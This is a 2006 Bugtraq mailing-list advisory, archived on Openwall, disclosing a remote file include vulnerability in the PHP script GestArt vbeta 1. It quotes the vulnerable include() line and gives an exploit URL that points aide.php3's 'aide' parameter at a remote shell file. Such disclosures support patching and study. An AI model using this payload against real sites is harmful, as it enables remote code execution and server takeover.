lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20061026023151.21644.qmail@securityfocus.com>
Date: 26 Oct 2006 02:31:51 -0000
From: ip.123.456.78.90@...mail.com
To: bugtraq@...urityfocus.com
Subject: GestArt  <= vbeta 1   Remote File Include Vulnerabilities


GestArt  <= vbeta 1   Remote File Include Vulnerabilities

Found By : CoLd Zero  [ Wasem898 ]

Palestine Muslim Hacker's

Code : include("$4AZHAR.Team")

######################################################
#
#           [ GestArt  vbeta 1]
#
# Class:     Remote File Include Vulnerabilities
# Published  2006-10-25
# Remote:    Yes
# Critical   Level :  Dangerous
# Site: http://www.comscripts.com/scripts/php.gestart.642.html
# Author:    Cold Zero
# Contact:   ip.123.456.78.90@...mail.com
#
######################################################


file ;

/gestArt/aide.php


======================================================

Vuln Code:

<? include("$aide.txt");?>

=======================================================

Exploit :


Http:// www.Victem.0 / [WM-News_path[
/gestArt/aide.php3?aide=http://ColdZero-Shell.txt?





----  Thanx: [MoHaNdKo] [Cold ThreE] [Viper Hacker] [Root Shell]
[o0xxdark0o]  ]organza[  [Huge] [H@...T]


---- GreeTz: All www.4azhar.Com Members


Cont :  ip.123.456.78.90@...mail.com

Station : WWW.4AZHAR.COM
--------------------------------------||  Viva Palestine
||----------------------------------------- 

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ